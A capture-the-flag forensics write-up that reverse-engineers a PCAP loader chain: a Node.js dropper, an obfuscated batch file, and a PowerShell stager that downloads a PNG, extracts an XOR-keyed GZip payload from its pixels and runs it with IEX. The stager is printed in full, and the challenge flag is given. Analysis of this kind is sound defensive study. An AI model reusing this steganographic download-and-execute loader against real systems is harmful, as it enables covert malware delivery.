Invisible#

Challenge Information#

Category: Forensics
Difficulty: Easy
Points: 75
Artifact: capture.pcap
Flag Format: VBD{...}
Flag: VBD{8059d662ede0cdd27c0d218c2943248f}

TL;DR#

The PCAP delivers a Node.js dropper that saves an obfuscated batch file. That batch file expands into a PowerShell stager which downloads payload.png, reads a 4-byte length from the first two pixels, extracts exactly 532 RGB bytes starting from pixel index 2, XORs them with 91d2f87dab32f433, GZip-decompresses the result, and executes stage-2. Stage-2 contains the flag directly:

VBD{8059d662ede0cdd27c0d218c2943248f}

1. Initial Triage#

The only provided artifact was:

1
capture.pcap

Exporting HTTP objects revealed several images plus two scripts of interest:

init.js
packageloader.bat
payload.png

init.js is straightforward. It downloads the batch file from Codeberg and places it in the Windows Startup folder:

1
const telemetryEndpoint =
2
  'https://codeberg.org/maldev/loader/raw/branch/main/packageloader.bat';

So the real solve path is in packageloader.bat and whatever it does with payload.png.

2. Reconstructing the Batch Loader#

packageloader.bat is heavily padded with junk %...% insertions and thousands of set VAR=value assignments. The :PAYLOAD section launches PowerShell using a very long string composed from %VAR% expansions.

The key step is:

Remove junk %...% insertions from the set lines.
Build a variable dictionary from the recovered assignments.
Expand the raw powershell.exe -c "%VAR%%VAR%..." payload line.

After expansion, the relevant stage-1 PowerShell is:

1
$wc=New-Object Net.WebClient
2
$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64)')
3
$imgData=$wc.DownloadData('https://i.ibb.co/0zt4quciwxs2/payload.png')
4
$ms=New-Object IO.MemoryStream(,$imgData)
5
Add-Type -AssemblyName System.Drawing
6
$bmp=[Drawing.Bitmap]::FromStream($ms)
7
$sz=($bmp.GetPixel(0,0).R -shl 24) -bor ($bmp.GetPixel(0,0).G -shl 16) -bor ($bmp.GetPixel(0,0).B -shl 8) -bor $bmp.GetPixel(1,0).R
8
$buf=New-Object byte[] $sz
9
$idx=0
10
$pi=2
11
while($idx -lt $sz){
12
  $x=$pi%$bmp.Width
13
  $y=[math]::Floor($pi/$bmp.Width)
14
  $px=$bmp.GetPixel($x,$y)
15
  if($idx -lt $sz){$buf[$idx]=$px.R;$idx++}
16
  if($idx -lt $sz){$buf[$idx]=$px.G;$idx++}
17
  if($idx -lt $sz){$buf[$idx]=$px.B;$idx++}
18
  $pi++
19
}
20
$k=[Text.Encoding]::UTF8.GetBytes('91d2f87dab32f433')
21
for($j=0;$j -lt $buf.Length;$j++){
22
  $buf[$j]=$buf[$j] -bxor $k[$j%$k.Length]
23
}
24
$ms2=New-Object IO.MemoryStream(,$buf)
25
$gz=New-Object IO.Compression.GZipStream($ms2,[IO.Compression.CompressionMode]::Decompress)
26
$sr=New-Object IO.StreamReader($gz)
27
IEX($sr.ReadToEnd())

This completely defines the extraction logic.

3. Understanding `payload.png`#

The PNG is 141x141 RGB. The first two pixels are used as metadata.

Observed values:

1
pixel(0,0) = (0, 0, 2)
2
pixel(1,0) = (20, 60, 163)

The loader computes the payload size as:

1
sz = (0 << 24) | (0 << 16) | (2 << 8) | 20 = 532

So only the first 532 extracted RGB bytes matter. The decoder starts at pixel index 2, then reads R, G, B from each pixel until the buffer is full.

4. Reproducing the Decode#

Once the real logic is known, the solve is short. This Python script reproduces the PowerShell behavior exactly:

1
from PIL import Image
2
import gzip
3
import re
4

5
img = Image.open('payload.png').convert('RGB')
6
pix = list(img.getdata())
7

8
sz = (pix[0][0] << 24) | (pix[0][1] << 16) | (pix[0][2] << 8) | pix[1][0]
9

10
buf = bytearray()
11
pi = 2
12
while len(buf) < sz:
13
    px = pix[pi]
14
    for channel in px:
15
        if len(buf) < sz:
16
            buf.append(channel)
17
    pi += 1
18

19
key = b'91d2f87dab32f433'
20
for i in range(len(buf)):
21
    buf[i] ^= key[i % len(key)]
22

23
stage2 = gzip.decompress(bytes(buf)).decode('utf-8', errors='replace')
24
print(stage2)
25

26
m = re.search(r"VBD\{[^}]+\}", stage2)
27
print(m.group(0))

Output:

1
VBD{8059d662ede0cdd27c0d218c2943248f}

5. Stage-2 Payload#

The decompressed PowerShell contains the flag as a token used in fake C2 traffic:

1
$token='VBD{8059d662ede0cdd27c0d218c2943248f}'

The rest of the script is just malware-themed noise:

creates a mutex
defines a fake C2 URL
sends the token in an HTTP header
polls for remote tasks

For the challenge, the token is the flag.

6. Final Flag#

VBD{8059d662ede0cdd27c0d218c2943248f}

Lessons Learned#

If a PCAP delivers a loader chain, reconstruct the loader before spending too long on blind stego heuristics.
Junk %...% insertions in batch files are often easier to defeat by rebuilding the final %VAR% expansion than by reading the file manually.
For image-based loaders, the first few pixels often contain metadata such as size, key material, or traversal hints.